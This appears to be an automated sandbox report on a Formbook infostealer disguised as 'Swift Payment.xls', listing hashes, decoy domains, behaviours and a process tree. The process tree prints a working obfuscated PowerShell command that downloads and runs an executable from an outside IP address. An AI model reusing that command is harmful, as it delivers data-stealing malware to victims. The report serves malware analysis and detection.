Resubmissions

29-08-2024 14:12

240829-rhtsbswarc 10

Analysis

  • max time kernel
    149s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    29-08-2024 14:12

General

  • Target

    Swift Payment.xls

  • Size

    537KB

  • MD5

    3ddbb73564bd5da178d353887cb82cf1

  • SHA1

    9e7cfbac422ef392dff72228be57a86f37eed26a

  • SHA256

    eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847

  • SHA512

    c4cc01cc620b8f5cf457221679760f5a36e32cf1d2fa42f3a30bac8949bd152ab0097e2ce02da70111533b0b21c43a71200aba97362c0270623a56a2b1d44d0e

  • SSDEEP

    12288:pNsZ4UeZzxvJLrl0jHUxIbuKlt70AFg7JzXAZo+r:s2xxJIUgL0AGkb

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

b48n

Decoy

anifestmindset.net

ommybahamabigsales.shop

3tcxr.xyz

iano-world.net

rconf23.net

atherpa.shop

trllrpartners.club

5sawit777.pro

ctbhuxcdreioijresol.top

opinatlas.app

pinstar.xyz

mfengwa.top

8games13.xyz

tickpaket.online

iphuodongallbbtbtm.top

ental-bridges-51593.bond

laywithkemon.rest

lkpiou.xyz

a88.land

igfloppafan.club

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1212
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"
      2⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2640
    • C:\Windows\SysWOW64\help.exe
      "C:\Windows\SysWOW64\help.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2024
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2416
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'JEJqY0QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSREVmaU5JVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1dUTnVqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbU5Xd3hBVWtuVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE9lVEpqQ056LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZLKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3THRQQktOTnlLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpVTkcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkQmpjRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNTU1L01FbXBFbmcuZXhlIiwiJEVOdjpBUFBEQVRBXE1FbXBFbmcuZXhlIiwwLDApO3N0YVJ0LXNsRWVwKDMpO1NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcTUVtcEVuZy5leGUi'+[cHAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkx7xczb.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2928
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB4AF.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2888
        • C:\Users\Admin\AppData\Roaming\MEmpEng.exe
          "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Users\Admin\AppData\Roaming\MEmpEng.exe
            "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:572

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    344B

    MD5

    2a22d79f810194591562f5550fd2fdaf

    SHA1

    9085f1492a5bcc3f539169ebd82cbe8ead4f4eec

    SHA256

    d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1

    SHA512

    281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    3e67053f124cd1c8e14d5e35f85e1cbb

    SHA1

    b2fbca7441eb8dc1665a51ca6990c7df4f4ae7a4

    SHA256

    cc2118cbdaaf54d1a2201d443b821962ddf2fb08899939e8afd8eaff8a05cc86

    SHA512

    2a08c98130f3cb46b93b986287de1f89d714d97337d306dce271da96f976b2e479e5d2d5b1f883b191389158660a570c3ba3a43ddae513da662ac1c546474081

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

    Filesize

    544B

    MD5

    82c02175409404faa4a437555f8afd87

    SHA1

    e4e4779a8c2d98aa2117e1eb26554fe7acc910c7

    SHA256

    ce2fa9fc2af477205b89c9c92764024096048565c70c8f147af267127702698b

    SHA512

    a888da3d47f2eb007b4ad839f6a2e2cf715f8056f20b9101f893e8476297b7fe6c2dc8d86034eb51ce22e1fd1cb396f137cb177f5884b79af1b20f4dbbf49aac

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\IEnetstateIntenet[1].hta

    Filesize

    12KB

    MD5

    3e26ce1d61b2d6fe88553bc84b6ac32a

    SHA1

    c7109174e1d1faea9cceaa01955bbe2d138ed2d1

    SHA256

    f450ceba92f654aee3efb78425232cd2917de9e43a258423cc98b9667be6102f

    SHA512

    e931d2c520c205127fd4e3ad0a577111eb50cb592235447931a2739a4187afb0d9c6916acaee5ca58a82d4f27d652b620d6cba8d62814e405671b94bf5766259

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F06C5DE6.emf

    Filesize

    4.3MB

    MD5

    8a188a6917ad1fa0c7f1aa20a63c8593

    SHA1

    4d2270d647d4a3680b47e85501c7ab1442ddcbb2

    SHA256

    728a3d9b1bee7cd8baa90aa0b1a4805a93238c8f835ea685931ac676ba7ef3e3

    SHA512

    823246cac3d8a45980ce0623c485fb0b74ce7aa68cca37b22fef1924685f1201298163c398688057736ec4551999b5455db1c97abc7da97e5a07589cd4fd7cdf

  • C:\Users\Admin\AppData\Local\Temp\CabAF14.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESB4B0.tmp

    Filesize

    1KB

    MD5

    3a7593cdda984754158e8af5d4c671c8

    SHA1

    81b0bee00b076c315415dec30a534011c85aaef5

    SHA256

    d5c9150e9d34895f9fa45514f0df0c3d7c22dba29ff3a2596713ca29023f217b

    SHA512

    2c7befee6bbada94e74c16b5ca962df59a9d5445583f6b75e930384ebe61e4173fbf1bceedae5bf80ca8decfe2b15104ba55fdb18bfb4ea76020f68e6be40d5a

  • C:\Users\Admin\AppData\Local\Temp\nkx7xczb.dll

    Filesize

    3KB

    MD5

    df5477c845671846e563304193ec863d

    SHA1

    12f88c2e596aec3645e3f489d5d882970a399615

    SHA256

    c9ca950f2ab7a7e366d4f162c2cc41bc1c3613eb2c2b2ea5f604ac999f1aa00f

    SHA512

    c394689eb3996f10c7aa71180f53a8c7aba38e1116ba0b6fdcf00a0f7c2b98b3e77c1909e47e842c2a3c53bc8bc484254635b6a906fdd120c50f281c8acb9aac

  • C:\Users\Admin\AppData\Local\Temp\nkx7xczb.pdb

    Filesize

    7KB

    MD5

    b50c297c51805c240ef0a12df98e881b

    SHA1

    6fbf3bf3b6af9940305028d16bf1f2095f699f0e

    SHA256

    adeaec9bd22a2be62463ab00a2f00f110244932872c48be060eeaa8f0b8d9ef2

    SHA512

    74391521d0681918955015102951ae185d312e2fa752998a7601f406c67f82fde8081e58a12b2acb1a236c35d8fdc36392a20881217571a508508ed8180fece5

  • C:\Users\Admin\AppData\Roaming\MEmpEng.exe

    Filesize

    604KB

    MD5

    dd2e0becfb1316c49975386fc3367c45

    SHA1

    98c578ff997ef781919ca5967251fa9d462a756e

    SHA256

    14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628

    SHA512

    4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB4AF.tmp

    Filesize

    652B

    MD5

    cf0eba045c28eb2b4994be1e324e1216

    SHA1

    114167922a85316b65a9c8f2d5d96557186173cd

    SHA256

    bcb4caa01bedbe917faf95e2b9a929ac35ad4721beae9f952cba3e1bfaa7f04f

    SHA512

    0abafc0c13c77ca238a9fe1f4886c8ef9d02861aad3d08e3841e2134a00c403613a97822d4dbdf0ce1b179eac433d8aa990757947b075e4bbaffeda64ad7d8fa

  • \??\c:\Users\Admin\AppData\Local\Temp\nkx7xczb.0.cs

    Filesize

    469B

    MD5

    ea113715d78eb5483c3507b3cbaebc06

    SHA1

    daa1297b0545649dd504537c2810082ef4156c32

    SHA256

    812d03a581b330a9d0dc751fc29857600c7a6988b748fb5c091850c2ac1e0a7d

    SHA512

    3595451c9eccd0fda379e6d906f45c87b90f52e0c70b609145ec037127fb72001b8f38697ff497806bc20cbecbc0c29d3565db15cc08a4f420d97e65b1aaa051

  • \??\c:\Users\Admin\AppData\Local\Temp\nkx7xczb.cmdline

    Filesize

    309B

    MD5

    ae56762dc0d08b6711b54d95e3924a32

    SHA1

    b96e539a51c2c432cde1393bf5a555706aaa438a

    SHA256

    a4a3d179bf3f5c4b49b792211e81b7dddf4b4a86521f75b5422ed418d887b679

    SHA512

    a667b7354c055c1a5cbcd652b66566e851ed9ffdef1fbef40a5dc93e3f7f8bbf5da929b479bad43bb02a39108f1b8fcd9b58a6d3960985130b1daffa4cbb5a56

  • memory/572-68-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/572-73-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/572-77-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/572-71-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/572-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1212-86-0x0000000006880000-0x0000000006923000-memory.dmp

    Filesize

    652KB

  • memory/1212-76-0x0000000003180000-0x0000000003280000-memory.dmp

    Filesize

    1024KB

  • memory/1880-66-0x00000000004D0000-0x00000000004E8000-memory.dmp

    Filesize

    96KB

  • memory/1880-67-0x0000000002180000-0x00000000021F6000-memory.dmp

    Filesize

    472KB

  • memory/1880-65-0x0000000000810000-0x00000000008AC000-memory.dmp

    Filesize

    624KB

  • memory/2024-79-0x0000000000740000-0x0000000000746000-memory.dmp

    Filesize

    24KB

  • memory/2024-80-0x0000000000080000-0x00000000000AF000-memory.dmp

    Filesize

    188KB

  • memory/2640-20-0x0000000001E50000-0x0000000001E52000-memory.dmp

    Filesize

    8KB

  • memory/2640-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2640-58-0x000000007234D000-0x0000000072358000-memory.dmp

    Filesize

    44KB

  • memory/2640-1-0x000000007234D000-0x0000000072358000-memory.dmp

    Filesize

    44KB

  • memory/2640-91-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2640-94-0x000000007234D000-0x0000000072358000-memory.dmp

    Filesize

    44KB

  • memory/2740-19-0x0000000001D80000-0x0000000001D82000-memory.dmp

    Filesize

    8KB